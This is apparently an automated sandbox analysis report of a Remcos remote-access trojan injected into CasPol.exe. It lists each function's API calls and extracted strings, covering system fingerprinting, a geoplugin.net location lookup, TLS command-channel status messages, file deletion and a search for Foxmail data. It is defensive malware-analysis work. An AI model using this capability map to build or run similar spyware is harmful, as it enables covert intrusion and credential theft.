                                                                                                                  • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                                  APIs
                                                                                                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1815803762-0
                                                                                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                  • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                  • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                  APIs
                                                                                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7CF
                                                                                                                  • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Name$ComputerUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4229901323-0
                                                                                                                  • Opcode ID: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                  • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                  • Opcode Fuzzy Hash: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                  • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  • Opcode ID: 31219136052544a26d77da0625eb89f11a5a625e23b8e682f5fa2601c68a04a1
                                                                                                                  • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                  • Opcode Fuzzy Hash: 31219136052544a26d77da0625eb89f11a5a625e23b8e682f5fa2601c68a04a1
                                                                                                                  • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                                                                                   Control-flow Graph
                                                                                                                   (Rendered graph of the function at 0040D767 not reproduced here; legend: Executed / Not Executed. Win32 calls named in the graph's basic blocks: GetModuleFileNameW, StrToIntA, CreateThread (several), SetProcessDEPPolicy, Sleep, DeleteFileW.)
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-B3IX49$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                  • API String ID: 2830904901-1275367719
                                                                                                                  • Opcode ID: 8c6ac7746136b26f12d2da0e8c563ff5b98e98f38763885ab39becc5433802cb
                                                                                                                  • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                  • Opcode Fuzzy Hash: 8c6ac7746136b26f12d2da0e8c563ff5b98e98f38763885ab39becc5433802cb
                                                                                                                  • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                   Control-flow Graph (rendered graph not reproduced in text)
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                  • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                                                  • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-B3IX49$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                  • API String ID: 524882891-3216469370
                                                                                                                  • Opcode ID: fb4277623446a57f4349aa3ee4574e48d3faf5c028d54bb1633e15e054248afb
                                                                                                                  • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                                                                                                  • Opcode Fuzzy Hash: fb4277623446a57f4349aa3ee4574e48d3faf5c028d54bb1633e15e054248afb
                                                                                                                  • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                   Control-flow Graph (rendered graph not reproduced in text)
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                    • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                  • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                  • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                  • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                  • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                  • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                  • API String ID: 1223786279-3931108886
                                                                                                                  • Opcode ID: 8ba61eb44736636d62dfb388e49255975280aa85e724cfe8b41d178e08704754
                                                                                                                  • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                  • Opcode Fuzzy Hash: 8ba61eb44736636d62dfb388e49255975280aa85e724cfe8b41d178e08704754
                                                                                                                  • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                    • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                    • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                    • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                    • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                                                  • API String ID: 672098462-2938083778
                                                                                                                  • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                  • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                  • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                  • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                   Control-flow Graph (rendered graph not reproduced in text)
                                                                                                                  APIs
                                                                                                                  • connect.WS2_32(?,00F4B2F8,00000010), ref: 004042A5
                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                  • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                   • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                  • API String ID: 994465650-2151626615
                                                                                                                  • Opcode ID: 8c905b45f271754ebccbf66324b392c02f54ace195c47071f909cd673dbb9e9f
                                                                                                                  • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                  • Opcode Fuzzy Hash: 8c905b45f271754ebccbf66324b392c02f54ace195c47071f909cd673dbb9e9f
                                                                                                                  • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                  • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3658366068-0
                                                                                                                  • Opcode ID: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                  • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                  • Opcode Fuzzy Hash: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                  • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48

                                                                                                                  Control-flow Graph

                                                                                                                  • Graph: control-flow graph of the function at 0040C89E (basic blocks 40c89e-40ca85, including the GetLongPathNameW call site); rendered graph image and executed/not-executed colouring not preserved in this export
                                                                                                                  APIs
                                                                                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: LongNamePath
                                                                                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                  • API String ID: 82841172-425784914
                                                                                                                  • Opcode ID: 8bb05b44eb04f1e0dc5581eb888e05d16a888ad6e7e27c2a6ee5d7172b9019e7
                                                                                                                  • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                  • Opcode Fuzzy Hash: 8bb05b44eb04f1e0dc5581eb888e05d16a888ad6e7e27c2a6ee5d7172b9019e7
                                                                                                                  • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                    • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                  • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                  • API String ID: 782494840-3211212173
                                                                                                                  • Opcode ID: 3c0299fe29c24bb7778f62d6aaca1a6ea748efcef7158b6df084458578b8116c
                                                                                                                  • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                  • Opcode Fuzzy Hash: 3c0299fe29c24bb7778f62d6aaca1a6ea748efcef7158b6df084458578b8116c
                                                                                                                  • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE

                                                                                                                  Control-flow Graph

                                                                                                                  • Graph: control-flow graph of the function at 0041A52B (basic blocks 41a52b-41a5d8, covering the InternetOpenW / InternetOpenUrlW / InternetReadFile / InternetCloseHandle call sites); rendered graph image and executed/not-executed colouring not preserved in this export
                                                                                                                  APIs
                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                  Strings
                                                                                                                  • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                  • String ID: http://geoplugin.net/json.gp
                                                                                                                  • API String ID: 3121278467-91888290
                                                                                                                  • Opcode ID: 77afb7aa6b705f4675ab5a767cf1234564151b956219bab6c9cba43669e19d49
                                                                                                                  • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                                                                                                                  • Opcode Fuzzy Hash: 77afb7aa6b705f4675ab5a767cf1234564151b956219bab6c9cba43669e19d49
                                                                                                                  • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA

                                                                                                                  Control-flow Graph

                                                                                                                  • Graph: control-flow graph of the function at 1000C7E6 (basic blocks 1000c7e6-1000c877, covering the GetModuleHandleA / GetProcAddress / VirtualProtect call sites); rendered graph image and executed/not-executed colouring not preserved in this export
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
